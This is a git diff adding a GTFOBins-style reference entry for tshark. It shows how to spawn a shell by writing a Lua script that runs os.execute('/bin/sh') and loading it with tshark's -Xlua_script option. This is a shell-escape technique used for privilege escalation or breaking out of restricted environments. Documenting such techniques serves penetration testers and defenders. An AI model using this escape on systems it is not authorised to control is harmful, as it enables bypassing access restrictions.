diff --git a/_gtfobins/tshark.md b/_gtfobins/tshark.md new file mode 100644 index 0000000..3d25d27 --- /dev/null +++ b/_gtfobins/tshark.md @@ -0,0 +1,9 @@ +--- +description: This program is able to execute [`lua`](/gtfobins/less/) code. +functions: + shell: + - code: | + TF=$(mktemp) + echo 'os.execute("/bin/sh")' >$TF + tshark -Xlua_script:$TF +---